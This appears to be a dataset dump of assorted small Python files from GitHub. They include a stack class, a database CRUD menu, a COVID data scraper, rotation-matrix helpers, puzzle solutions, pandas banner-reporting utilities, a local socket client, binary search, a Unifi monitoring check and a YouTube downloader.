return self._contents[self._height]\n\n def is_empty(self):\n '''(Stack) -> bool\n Return True iff this stack is empty\n '''\n # if our height is zero, this means our stack is empty\n return self._height == 0\n\n\nif (__name__ == '__main__'):\n # this is just some sample code that uses our stack\n # if we keep our ADT the same in each of our implementations\n # of our stack, then we should be confident that this code\n # will work identically each time\n stk = Stack()\n stk.push('a')\n stk.push('b')\n stk.push('c')\n print(stk.pop())\n stk.push('d')\n while(not stk.is_empty()):\n print(stk.pop())\n","repo_name":"OtsoValo/UTSC-Works","sub_path":"CSCA08/week9/week9_my_stack3.py","file_name":"week9_my_stack3.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11210431215","text":"from dbhelper import DBHelper\n\n\ndef main():\n db = DBHelper()\n while True:\n print(\"**********WELCOME**********\")\n print()\n print(\"PRESS 1 to insert new user\")\n print(\"PRESS 2 to display all user\")\n print(\"PRESS 3 to delete user\")\n print(\"PRESS 4 to Update user\")\n print(\"PRESS 5 to exit program\")\n print()\n\n try:\n choice = int(input())\n if (choice == 1):\n uid = int(input(\"Enter UserId: \"))\n username = input(\"Enter UserName: \")\n userphone = input(\"Enter User Phone: \")\n db.insert_user(uid, username, userphone)\n\n elif choice == 2:\n db.fetch_all()\n\n elif choice == 3:\n userid = int(\n input(\"Enter UserId to which you want to delete: \"))\n db.delete_user(userid)\n\n elif choice == 4:\n userid = int(input(\"Enter UserId: \"))\n newuserName = input(\"Enter new User Name: \")\n newphone = input(\"Enter new User Phone number: \")\n db.update_User(userid, newuserName, newphone)\n\n elif choice == 5:\n break\n\n else:\n print(\"Invalid Input ! Try again\")\n\n except Exception as e:\n print(e)\n print(\"Invalid Details ! Try again\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pawangupta5071/Database_helper_application","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2196123017","text":"from entity.entity import Entity\nfrom sql.sqldb import *\nfrom .factoryrepo import FactoryRepo\n\n\nclass DatabaseRepo(FactoryRepo):\n def __init__(self, table):\n import config\n self.db = Sql(config.get_config('database'))\n self.table = table\n super().__init__()\n\n def add(self, user):\n self.entities[1] = user\n\n def get(self, id):\n entity = Entity()\n entity.accessed = entity.now()\n del entity.created\n del entity.modified\n entity.id = id\n self.db.commit()\n return [i for i in self.db.select_one(self.table, id)][1:]\n\n def save(self, entity, timestamp=True):\n # verify if id exists, if exists then update else insert\n if entity.get_id() is None:\n if timestamp:\n entity.created = entity.now()\n self.db.insert(self.table, entity)\n else:\n if timestamp:\n entity.created = __class__.get(self, entity.get_id())[3]\n entity.modified = entity.now()\n self.db.update(self.table, entity)\n self.db.commit()\n # obtain last insert id in self\n entity.id = self.db.last_id(self.table)\n return entity\n\n def find(self, column, thing, element=\"*\"):\n return self.db.select_one_thing(element, self.table, column, thing)\n\n def delete(self, entity):\n self.db.delete(self.table, entity)\n self.db.commit()\n","repo_name":"LordOfNightmares/virtual-client-assistant","sub_path":"entity/databaserepo.py","file_name":"databaserepo.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6246109005","text":"# See https://app.powerbigov.us/view?r=eyJrIjoiMjA2ZThiOWUtM2FlNS00MGY5LWFmYjUtNmQwNTQ3Nzg5N2I2IiwidCI6ImU0YTM0MGU2LWI4OWUtNGU2OC04ZWFhLTE1NDRkMjcwMzk4MCJ9. \n# This is a weird format of Json and it might be better to use a browser-based scrape instead of a Json download...\n\nimport requests, json, io, datetime, pathlib\nimport county_report, state_report\n\nSTATE_ABBR = 'NV'\nSTATE = 'Nevada'\nURL = 'https://wabi-us-gov-iowa-api.analysis.usgovcloudapi.net/public/reports/querydata?synchronous=true'\n\ndef scraper():\n\n payload = ''\n\n filepath = pathlib.Path.cwd().joinpath('config', 'nv_post_body.json')\n with open(filepath, 'r') as file:\n payload = file.read().replace('\\n', '')\n\n # make an HTTP web request to get the data\n response = requests.post(URL, data=payload)\n\n if response.status_code == requests.codes.ok:\n # Success - print to the console that the HTTP request succeeeded\n print(' ', STATE_ABBR, ': Downloaded succeeded')\n\n jsonPayload = json.loads(response.text)\n features = jsonPayload['results'][0]['result']['data']['dsr']['DS'][0]['PH'][0]['DM0']\n\n counties = []\n \n for feature in features:\n\n if 'S' in feature:\n continue\n \n county_object = feature['C']\n has_R = 'R' in feature\n \n deaths = 0\n\n cases_index = 3\n if has_R:\n cases_index = 2\n else:\n deaths = int(county_object[1])\n\n county_name = county_object[0]\n confirmed = int(county_object[cases_index])\n \n county = county_report.CountyReport(STATE, county_name, confirmed, deaths, -1, -1, datetime.datetime.now())\n counties.append(county)\n \n # print the number of counties we processed\n print(' ', STATE_ABBR, ':', len(counties), ' counties processed OK')\n\n # build the state-level report object that will include all of the counties\n stateReport = state_report.StateReport(STATE, STATE_ABBR, counties, datetime.datetime.now())\n \n # return the state-level report\n return stateReport \n\n else:\n # Fail\n print(' ', STATE_ABBR, ': ERROR : Web download failed - HTTP status code ', response.status_code)\n\ndef findCounty(county_name, counties):\n for county in counties:\n if county.county == county_name:\n return county\n","repo_name":"erik1066/covid-web-scraper","sub_path":"src/nv_scraper.py","file_name":"nv_scraper.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"73533211072","text":"import csv\nimport pandas\nimport numpy\nfrom sklearn.linear_model import Lasso\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import normalize\n\ndata = {'red': [], 'white': []}\ny = {'red': [], 'white': []}\nwith open ('winequalityN.csv') as f:\n r = csv.reader(f)\n features = next(r)\n for row in r:\n row = [x if x != '' else 0 for x in row]\n data[row[0]].append([float(x) for x in row[1:-1]])\n y[row[0]].append(int(row[-1]))\n\noptimal = 0.0\noptimal_alpha = 0.0\nfor i in range(0, 10):\n x_train_red, x_test_red, y_train_red, y_test_red = train_test_split(data['red'],\n y['red'], test_size = 0.3)\n\n lr = LassoCV(normalize=True).fit(x_train_red, y_train_red)\n\n alpha = lr.alpha_\n\n predicted_red = lr.predict(x_test_red)\n\n test_len_red = len(x_test_red)\n\n correct = 0\n\n for i in range(test_len_red):\n if(abs(y_test_red[i] - predicted_red[i]) < 1):\n correct += 1\n\n print(\"RED:\" + str((correct / test_len_red) * 100))\n print(\"ALPHA:\" + str(alpha) + \"\\n\")\n\n if(optimal < (correct / test_len_red) * 100):\n optimal = (correct / test_len_red) * 100\n optimal_alpha = alpha\n\nprint(\"OPTIMAL RED:\" + str(optimal))\nprint(\"OPTIMAL ALPHA:\" + str(optimal_alpha) + \"\\n\")\n\noptimal = 0.0\noptimal_alpha = 0.0\nfor i in range(0, 10):\n x_train_white, x_test_white, y_train_white, y_test_white = train_test_split(data['white'],\n y['white'], test_size = 0.3)\n\n lw = LassoCV(normalize=True).fit(x_train_white, y_train_white)\n\n alpha = lw.alpha_\n\n predicted_white = lr.predict(x_test_white)\n\n test_len_white = len(x_test_white)\n\n correct = 0\n\n for i in range(test_len_white):\n if(abs(y_test_white[i] - predicted_white[i]) < 1):\n correct += 1\n\n print(\"WHITE:\" + str((correct / test_len_white) * 100))\n print(\"ALPHA:\" + str(alpha) + \"\\n\")\n\n if(optimal < (correct / test_len_white) * 100):\n optimal = (correct / test_len_white) * 100\n optimal_alpha = alpha\n\nprint(\"OPTIMAL WHITE:\" + str(optimal))\nprint(\"OPTIMAL ALPHA:\" + str(optimal_alpha) + \"\\n\")\n\noptimal = 0.0\noptimal_alpha = 0.0\nfor i in range(0, 10):\n x_train_both, x_test_both, y_train_both, y_test_both = train_test_split(data['red'] + data['white'],\n y['red'] + y['white'], test_size = 0.3)\n\n lb = LassoCV(normalize=True).fit(x_train_both, y_train_both)\n\n alpha = lb.alpha_\n\n predicted_both = lr.predict(x_test_both)\n\n test_len_both = len(x_test_both)\n\n correct = 0\n\n for i in range(test_len_both):\n if(abs((y_test_both[i]) - predicted_both[i]) < 1):\n correct += 1\n\n print(\"BOTH:\" + str((correct / test_len_both) * 100))\n print(\"ALPHA:\" + str(alpha) + \"\\n\")\n\n if(optimal < (correct / test_len_both) * 100):\n optimal = (correct / test_len_both) * 100\n optimal_alpha = alpha\n\nprint(\"OPTIMAL BOTH:\" + str(optimal))\nprint(\"OPTIMAL ALPHA:\" + str(optimal_alpha) + \"\\n\")\n","repo_name":"makisto/mmo","sub_path":"Lab3/lab31.py","file_name":"lab31.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15638728041","text":"\nimport numpy as np\ndef CLOOK(totalDiskSize, initialHeadPosition, direction, requested_tracks):\n data = requested_tracks\n c_lookDataList= []\n counter = 0\n\n # requestNumber = int(input(\"Enter number of request: \"))\n\n # for item in range(1, requestNumber+1):\n # tempRequestSequence = int(input(f\"Process #{item}: \"))\n # data.append(tempRequestSequence)\n\n # print(f\"Unsorted: {data}\") # Unsorted Data\n data.sort()\n # print(f\"Sorted: {data}\") # Sorted Data\n\n # initialHeadPosition = int(input(\"Enter Head Position: \"))\n initialHeadPosition = initialHeadPosition\n # c_lookDataList.append(initialHeadPosition)\n # totalDiskSize = int(input(\"Enter Disk Size: \"))\n totalDiskSize = totalDiskSize\n # direction = (input(\"Enter Direction[High / Low]: \"))\n direction = direction\n\n requestNumber = len(data)\n if direction == \"high\":\n for item in range(requestNumber):\n if data[item] == initialHeadPosition:\n counter = item\n for i in range(requestNumber-item): \n c_lookDataList.append(data[item])\n item+=1\n\n for j in range(counter):\n c_lookDataList.append(data[j])\n\n # print(f\"\\nProcess: {data}\")\n # print(f\"Graph: {c_lookDataList}\")\n\n\n\n elif direction.lower() == \"low\":\n for item in range(requestNumber):\n if data[item] == initialHeadPosition:\n for i in range(item+1):\n c_lookDataList.append(data[item])\n item-=1\n \n for j in range(requestNumber-len(c_lookDataList)):\n c_lookDataList.append(data[requestNumber-1])\n requestNumber-=1\n\n # print(f\"\\nProcess: {data}\")\n # print(f\"Graph: {c_lookDataList}\")\n currentTime = 0\n rand_floats = [currentTime]\n for i in range(len(requested_tracks)-1):\n currentTime += np.random.random_integers(1, 10) \n if currentTime in rand_floats:\n currentTime += 0.5 + np.random.random_integers(1, 10) + np.random.uniform(0.1, 0.9)\n rand_floats.append(currentTime)\n\n head_movements_calculation_string = []\n total_head_movements = 0\n # Calculation of total number of head movements\n for index in range(len(requested_tracks) - 1):\n total_head_movements += abs(requested_tracks[index] - requested_tracks[index + 1])\n if index == len(requested_tracks) - 1:\n plus_symbol = \"\" \n else: \n plus_symbol = \" +\"\n if requested_tracks[index] > requested_tracks[index + 1]:\n bigger = requested_tracks[index]\n smaller = requested_tracks[index + 1]\n else:\n bigger = requested_tracks[index + 1]\n smaller = requested_tracks[index]\n\n head_movements_calculation_string.append(\"(\" + str(bigger) + \"-\" + str(smaller) + \")\" + plus_symbol)\n\n head_movements_calculation_string = \" \".join(head_movements_calculation_string)\n head_movements_calculation_string = head_movements_calculation_string.rstrip('+') \n return rand_floats, total_head_movements, head_movements_calculation_string, c_lookDataList\n","repo_name":"0xM1cx/Disk_Scheduling_Algorithm","sub_path":"CLookDiskScheduling.py","file_name":"CLookDiskScheduling.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5730406417","text":"import subprocess\r\nimport os\r\nimport time\r\nfrom datetime import datetime\r\nfrom jazzstock_crawl.windows.crawl_snd_basic import get_stockcode_to_update as snd_counter\r\nfrom jazzstock_crawl.windows.crawl_ohlc_5min import get_stockcode_to_update as ohlc_min_counter\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nPATH_CWD = 'c://workspace/jazzstock_crawl/windows'\r\nPATH_LOG = os.path.join(PATH_CWD, 'log/windows_%s.log'%(str(datetime.now().date())))\r\n\r\n\r\n# 병렬실행 ===============================================================================================\r\n# pa = subprocess.Popen(['python3', '-u', '/workspace/jazzstock_script_runner/child.py', '5'],\r\n# stdout=open(os.path.join(PATH_LOG, 'test.log'), 'a'), bufsize=100,\r\n# universal_newlines=True)\r\n#\r\n# pb = subprocess.Popen(['python3', '-u', '/workspace/jazzstock_script_runner/child.py', '40'],\r\n# stdout=open(os.path.join(PATH_LOG, 'test.log'), 'a'), bufsize=100,\r\n# universal_newlines=True)\r\n\r\n# dic = {pa.pid: pa,\r\n# pb.pid: pb}\r\n#\r\n# check_process_is_finish(dic)\r\n\r\n# 실행 WITH TIMER ===============================================================================================\r\n\r\n\r\n\r\ndef run_process(script_path, iteration=1, life=60):\r\n i = 0\r\n while i < iteration:\r\n i+=1\r\n start = datetime.now()\r\n print('* RUN PROCESS %s FOR %s TIME, NOW: %s'%(script_path, i, start))\r\n process = subprocess.Popen(['python', '-u', script_path],\r\n stdout=open(PATH_LOG, 'a'), bufsize=100,\r\n universal_newlines=True)\r\n\r\n\r\n while True:\r\n elapesd_seconds = (datetime.now()-start).seconds\r\n\r\n # IF SCRIPT IS DONE\r\n if process.poll() is not None:\r\n print(i, process.poll(), elapesd_seconds, 'DONE')\r\n break\r\n\r\n # IF TIMEOVER\r\n elif elapesd_seconds > life:\r\n print(i, process.poll(), elapesd_seconds, \"TIMEOVER\")\r\n process.kill()\r\n break\r\n\r\n # ELAPSED TIME CHECK EVERY 5 SECONDS\r\n else:\r\n time.sleep(5)\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n\r\n # snd_flag = 9999\r\n # the_date = '2020-11-13'\r\n # while snd_flag > 50:\r\n # run_process(script_path=os.path.join(PATH_CWD, 'crawl_snd_basic.py'), iteration=1, life=30)\r\n # f = open('c:\\\\workspace\\\\jazstock_crawl\\\\log\\\\snd.log', 'r')\r\n # print(f.readline())\r\n # f.close()\r\n #\r\n # else:\r\n # print(\"SND_DONE\")\r\n\r\n\r\n # while ohlc_min_counter('2020-11-13')['result'] > 50:\r\n # print(' * COUNTER : %s' % (ohlc_min_counter('2020-11-13')['result']))\r\n # run_process(script_path=os.path.join(PATH_CWD, 'date_idx_update.py'), iteration=1, life=60)\r\n # else:\r\n # print(\"OHLC_DONE\")\r\n\r\n\r\n # run_process(script_path=os.path.join(PATH_CWD, 'crawl_snd_basic.py'), iteration=1, life=200)\r\n\r\n\r\n run_process(script_path=os.path.join(PATH_CWD,'boot.py'),iteration=1,life=60)\r\n run_process(script_path=os.path.join(PATH_CWD,'crawl_snd_basic.py'),iteration=35,life=200)\r\n run_process(script_path=os.path.join(PATH_CWD,'date_idx_update.py'),iteration=1,life=60)\r\n run_process(script_path=os.path.join(PATH_CWD,'crawl_ohlc_5min.py'),iteration=35,life=200)\r\n run_process(script_path=os.path.join(PATH_CWD,'crawl_index.py'),iteration=2,life=600)\r\n\r\n\r\n\r\n","repo_name":"jazztronomers/jazzstock_crawl","sub_path":"windows/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6258749315","text":"'''This module has a bunch of different functions that deal with\nrotations in 3-D space. It has no internal storage, so no class.\n\nSome notes:\n* Just for consistency, axes are labeled 0, 1, and 2.\n* All angles are in radians unless otherwise specified\n\nThis module has it own custom exception, `InvalidDCM` that is thrown\nif the user passes in stuff that is invalid for a DCM (e.g., an invalid \naxis combination for euler_angles)\n'''\nimport numpy as np\nimport math as m\n\nclass InvalidDCM(Exception):\n pass\n\ndef axis0(angle, degrees=False):\n '''Creates a DCM to rotate about axis 0 by angle\n\n Args:\n angle -- how far to rotate about the axis\n degrees -- whether angle should be in degrees (true) or radians (false, the default)\n \n Returns:\n A 3x3 numpy matrix that performs the rotation\n '''\n if degrees:\n #i_ = internal\n i_angle = m.radians(angle)\n else:\n i_angle = angle\n\n return np.array([[1., 0., 0.],[0., m.cos(i_angle), m.sin(i_angle)],[0., -m.sin(i_angle), m.cos(i_angle)]])\n\ndef axis1(angle, degrees=False):\n '''Creates a DCM to rotate about axis 1 by angle\n\n Args:\n angle -- how far to rotate about the axis\n degrees -- whether angle should be in degrees (true) or radians (false, the default)\n \n Returns:\n A 3x3 numpy matrix that performs the rotation\n '''\n if degrees:\n #i_ = internal\n i_ang = m.radians(angle)\n else:\n i_ang = angle\n\n return np.array([[m.cos(i_ang),0.,-m.sin(i_ang)],[0.,1.,0.],[m.sin(i_ang),0.,m.cos(i_ang)]])\n\ndef axis2(angle, degrees=False):\n '''Creates a DCM to rotate about axis 2 by angle\n\n Args:\n angle -- how far to rotate about the axis\n degrees -- whether angle should be in degrees (true) or radians (false, the default)\n \n Returns:\n A 3x3 numpy matrix that performs the rotation\n '''\n if degrees:\n #i_ = internal\n i_ang = m.radians(angle)\n else:\n i_ang = angle\n\n return np.array([[m.cos(i_ang),m.sin(i_ang),0.],[-m.sin(i_ang),m.cos(i_ang),0.,],[0.,0.,1.]])\n\ndef euler_angles(angles, axes, degrees=False):\n '''This creates a DCM that combines three angles, in the order specified by axes.\n The angle in location and axis [0] is applied first.\n\n Args:\n angles -- How far each rotation should happen\n axes -- indicies for which axis (0,1,2) should be rotated around\n\n Returns:\n A 3X3 numpy matrix that represents the rotation\n\n Raises:\n InvalidDCM\n '''\n if axes[0]==axes[1] or axes[1]==axes[2]:\n raise InvalidDCM('Two adjacent axes cannot be the same when using euler_angles')\n\n #fc = function_chooser\n fc = {0: axis0, 1: axis1, 2: axis2}\n \n going_out = np.identity(3)\n for ii in range(3):\n going_out = fc[axes[ii]](angles[ii],degrees).dot(going_out)\n\n return going_out\n\n","repo_name":"erik1026/EENG766_Final","sub_path":"rot.py","file_name":"rot.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70163358913","text":"\"\"\"Solution to day 13 parts 1 and 2\"\"\"\nimport re\n\nFIREWALL = \"\"\"0: 3\n1: 2\n4: 4\n6: 4\"\"\"\n\n\ndef load(day):\n \"\"\"Open specified days input file.\"\"\"\n filename = 'input_{}.txt'.format(str(day).zfill(2))\n return open(filename)\n\n\ndef parse_firewall_instruction(instruction):\n \"\"\"Parse single firewall instruction.\"\"\"\n layer, depth = re.match(r'(\\d+):\\s(\\d+)', instruction).groups()\n return int(layer), int(depth)\n\n\nassert parse_firewall_instruction(\"1: 2\") == (1, 2)\n\n\ndef parse_firewall(definition):\n \"\"\"Parse firewall definition to data structure.\"\"\"\n return {layer: depth for layer, depth in map(\n parse_firewall_instruction, definition.splitlines())}\n\n\nassert parse_firewall(FIREWALL) == {\n 0: 3,\n 1: 2,\n 4: 4,\n 6: 4\n}\n\n\ndef severity_cost_function(layer, depth):\n return layer * depth\n\n\ndef calculate_trip_severity(firewall, cost_function, offset=0):\n \"\"\" Example for depth 3\n 0 0\n 1 1\n 2 2\n 3 1\n 4 0\n 5 1\n 6 2\n 7 1\n 8 0\n \"\"\"\n severity = 0\n for layer, depth in firewall.items():\n if (layer + offset) % (2 * (depth - 1)) == 0:\n severity += cost_function(layer, depth)\n\n return severity\n\n\nassert calculate_trip_severity(parse_firewall(FIREWALL), severity_cost_function) == 24\n\n\nprint(\"Solution to part 1: {}\".format(\n calculate_trip_severity(\n parse_firewall(load(13).read()),\n severity_cost_function)))\n\n\ndef collision_cost_function(layer, depth):\n return 1\n\n\ndef wait_for_safe_firewall_traversal(firewall, cost_function):\n wait = 0\n while calculate_trip_severity(firewall, cost_function, wait):\n wait += 1\n return wait\n\n\nassert (wait_for_safe_firewall_traversal(parse_firewall(FIREWALL), collision_cost_function)) == 10\n\n\nprint(\"Solution to part 2: {}\".format(\n wait_for_safe_firewall_traversal(\n parse_firewall(load(13).read()),\n collision_cost_function)))\n","repo_name":"deluxebrain/advent-of-code-2017-python","sub_path":"day_13.py","file_name":"day_13.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1726298219","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom config import (BANNER_SHEET_ED_RANGE, BANNER_SHEET_EM_RANGE)\n\n\ndef set_project_for_banners(project):\n if project == 'ED':\n sheet_range = BANNER_SHEET_ED_RANGE\n re_banner_parameter = '.*(ed_ban.*)'\n ...\n elif project == 'EM':\n sheet_range = BANNER_SHEET_EM_RANGE\n re_banner_parameter = '.*(em_ban.*)'\n ...\n else:\n raise ValueError(\"Invalid project name\")\n return sheet_range, re_banner_parameter\n\n\ndef extract_banners_parameters(df, re_banner_parameter):\n df['Итоговая ссылка с меткой'] = df['Итоговая ссылка с меткой'].str.replace(rf'{re_banner_parameter}', r'\\1', regex=True)\n return df\n\n\n\ndef transform_plan_date_columns(df, column_a, column_b):\n mask = df[column_a].notnull()\n df.loc[mask, column_b] = df[column_a]\n return df\n\n\ndef transform_fact_date_columns(df, column_a, column_b):\n mask = df[column_b].isnull()\n df.loc[mask, column_b] = df[column_a]\n return df\n\n\ndef transform_banners_sheet(df, project, PLACEMENT_ERROR = 0):\n '''\n Преобразует таблицу с отчетностью по размещению баннеров в удобную для объединения с данными метрики.\n Использует коэфициент ошибки, если установить 1, будет отнимать 1 день от нрачала размещения и добавлять 1 день к концу размещения\n \n '''\n df['Проект'] = project\n df = df.drop(df[df['Итоговая ссылка с меткой'] == \"Ошибка: Есть незаполненное поле\"].index)\n df['Реальная дата СТАРТА размещения'] = pd.to_datetime(df['Реальная дата СТАРТА размещения'], format=\"%d.%m.%Y\") - datetime.timedelta(days=PLACEMENT_ERROR)\n df['Реальная дата КОНЦА размещения'] = pd.to_datetime(df['Реальная дата КОНЦА размещения'], format=\"%d.%m.%Y\") + datetime.timedelta(days=PLACEMENT_ERROR)\n new_banners_sheet = []\n for _, row in df.iterrows():\n str_categ = row['Где размещается (или ID категории)']\n if str_categ == 'Весь каталог':\n str_categ = r'(/categ).*'\n elif str_categ == 'Главная':\n str_categ = r'(/)'\n else:\n str_categ = str_categ.replace('_', '|')\n str_categ = rf'.*({str_categ}).*'\n row['Где размещается (или ID категории)'] = str_categ\n dates = pd.date_range(start=row['Реальная дата СТАРТА размещения'], end=row['Реальная дата КОНЦА размещения'], freq='D')\n for date in dates:\n newRow = row.copy()\n newRow['Date'] = date\n new_banners_sheet.append(newRow)\n new_df = pd.DataFrame(new_banners_sheet)\n new_df['Date'] = new_df['Date'].astype(str)\n ...\n return new_df\n\n\ndef get_date_range_from_banners_sheet(df, PLACEMENT_ERROR = 0):\n '''\n Получает даты начала и конца для запросов к Яндекс метрике\n Использует коэфициент ошибки, если установить 1, будет отнимать 1 день от нрачала размещения и добавлять 1 день к концу размещения, по умолчаю 0.\n \n '''\n start_date = (df['Реальная дата СТАРТА размещения'].min() - datetime.timedelta(days=PLACEMENT_ERROR)).strftime('%Y-%m-%d')\n end_date = (df['Реальная дата КОНЦА размещения'].max() + datetime.timedelta(days=PLACEMENT_ERROR))\n today = pd.Timestamp.today()\n if end_date >= today:\n end_date = today.strftime('%Y-%m-%d')\n else:\n end_date = end_date.strftime('%Y-%m-%d')\n ...\n return start_date, end_date\n\n\ndef get_views_from_categories(banners_df, category_data_df):\n '''\n Суммрует просмотры категорий соответствующие шаблону регулярного выражения из таблицы банннеров\n\n '''\n new_banners_sheet = []\n for _, row in banners_df.iterrows():\n str_categ = row['Где размещается (или ID категории)']\n date_categ = row['Date']\n filtered_df = category_data_df[(category_data_df['ym:pv:URLPath'].str.extract(str_categ, expand=False).notnull()) & (category_data_df['ym:pv:date'] == date_categ)]\n total_value = filtered_df[['ym:pv:pageviews','ym:pv:users']].sum()\n new_row = row.copy()\n new_row['pageviews'] = total_value[0]\n new_row['users'] = total_value[1]\n new_banners_sheet.append(new_row)\n new_df = pd.DataFrame(new_banners_sheet)\n ...\n return new_df\n\n\ndef preparation_final_banner_report(banner_report_df):\n banner_report_df = banner_report_df.drop(['Где размещается (или ID категории)', 'ym:pv:date', 'ym:pv:URLParamNameAndValue', 'Дата старта в отчет', 'Дата окончания в отчет', 'Реальная дата СТАРТА размещения', 'Реальная дата КОНЦА размещения'], axis=1)\n new_columns = {'ym:pv:pageviews': 'Клики','ym:pv:users': 'Уникальные клики','pageviews': 'Показы','users': 'Охват'}\n banner_report_df = banner_report_df.rename(columns=new_columns)\n banner_report_df['Дата начала размещения'] = pd.to_datetime(banner_report_df['Дата начала размещения'], format=\"%d.%m.%Y\")\n banner_report_df['Дата окончания размещения'] = pd.to_datetime(banner_report_df['Дата окончания размещения'], format=\"%d.%m.%Y\")\n banner_report_df[['Дата начала размещения','Дата окончания размещения']] = banner_report_df[['Дата начала размещения','Дата окончания размещения']].astype(str)\n ...\n return banner_report_df\n\n\ndef multiplication_metrics(df, list_of_metrics, min_multiplier, max_multiplier):\n df[list_of_metrics] = df[list_of_metrics].astype(float)\n # check random seed\n random_factors = np.random.uniform(min_multiplier, max_multiplier, size=(len(df), len(list_of_metrics)))\n df[list_of_metrics] = (df[list_of_metrics] + 1) * random_factors\n df[list_of_metrics] = df[list_of_metrics].round(0)\n df[list_of_metrics] = df[list_of_metrics].astype(str)\n return df","repo_name":"maksvg8/web-analytics","sub_path":"custom_reports/modules/banner_reporting.py","file_name":"banner_reporting.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14723278079","text":"import socket\n\n# create the socket object\ns = socket.socket()\n\n# port that we want to befriend\nport = 12345\n\n# connect to the server on local computer\ns.connect(('127.0.0.1',port))\n\n# receive data from the server\nprint(str(s.recv(1024)))\n# close the connection\ns.close()\n","repo_name":"davethedave41/ALprogramming","sub_path":"proxy/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35021679226","text":"def BinarySearch(pArr, pSearchItem, pStepNumber):\n '''\n Recursive function BinarySearch - find item in array pArr using BinarySearch algorithm\n\n Agruments\n pArr input Array\n pSearchItem search item\n pStepNumber number of search iteration\n '''\n if len(pArr) == 1:\n if pArr[0] == pSearchItem:\n return True, pStepNumber\n else:\n return False, pStepNumber\n else:\n vMediumElement = len(pArr)//2\n if pArr[vMediumElement] > pSearchItem:\n return BinarySearch(pArr[:vMediumElement], pSearchItem, pStepNumber+1)\n elif pArr[vMediumElement] < pSearchItem:\n return BinarySearch(pArr[vMediumElement:], pSearchItem, pStepNumber+1)\n elif pArr[vMediumElement] == pSearchItem:\n return True, pStepNumber\n\ndef BinarySearchWhile(pArr, pSearchItem):\n '''\n function BinarySearch using While cycle\n\n Agruments\n pArr input Array\n pSearchItem search item\n '''\n low = 0\n high = len(pArr)-1\n while low <= high:\n mid = (low+high) // 2\n guess = pArr[mid]\n if guess == pSearchItem:\n return True\n if guess > pSearchItem:\n high = mid -1\n else:\n low = mid + 1\n return False\n\n# test case\npArr = [2,3,6,11,25,34,45,90,34,22,19,45]\n# tesh using while cycle\nif BinarySearchWhile(sorted(pArr), 25):\n print ('Item found!')\n\n# test using recursive function\n(vFound, pStepNumber) = BinarySearch(sorted(pArr), 25, 1)\n# return FoundFlag and number of iterations\nif vFound:\n print ('Item found! Number of Iterations = ' + str(pStepNumber))\nelse:\n print ('Item not found!')\n\n","repo_name":"kozachenko-a/algorithms","sub_path":"BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9713212254","text":"#!/usr/bin/python\n#import pprint\n\ndef inventory_unifi_radio(info):\n import json\n parsed = json.loads(\" \".join([item for sublist in info for item in sublist]))\n for radio in parsed[\"radio_table_stats\"]:\n name = radio[\"name\"]\n yield name, {}\n\n\n\ndef check_unifi_radio(item, params, info):\n import json\n parsed = json.loads(\" \".join([thing for sublist in info for thing in sublist]))\n if \"radio_table_stats\" not in parsed:\n return 3, \"no radio_table_stats\"\n for radio in parsed[\"radio_table_stats\"]:\n name = radio[\"name\"]\n if name == item:\n satisfaction = radio[\"satisfaction\"]\n state = radio[\"state\"]\n perfdata = [( \"satisfaction\", int(satisfaction))]# ( \"load1\", float(load1)), (\"load5\",float(load5)), (\"load15\",float(load15)) ]\n out = \"State: %s Satisfaction: %s%%\" % (state, satisfaction)\n state = 0\n return 0, out, perfdata\n\n\n\n\ncheck_info['unifi_aps.radio'] = {\n 'inventory_function': inventory_unifi_radio,\n 'check_function': check_unifi_radio,\n 'service_description': 'Unifi radio %s',\n 'has_perfdata': True,\n}\n","repo_name":"cstegm/checkmk_unifi_aps","sub_path":"checks/unifi_aps_radio.py","file_name":"unifi_aps_radio.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29875114734","text":"import pytube\n#from pytube import YouTube\nimport os\n\n# link = \"https://www.youtube.com/watch?v=mpjREfvZiDs\"\n# yt = pytube.YouTube(link)\n# stream = yt.streams.first()\n# stream.download()\n# video_name = stream.default_filename\n# os.rename(video_name, 'newvideo.mp4')\n\ndef download():\n link = input(\"Enter the youtube link you want to donwload: \")\n name = input(\"Name the vidoe: \")\n yt = pytube.YouTube(link)\n stream = yt.streams.get_highest_resolution()\n stream.download()\n video_name = stream.default_filename\n os.rename(video_name, name + 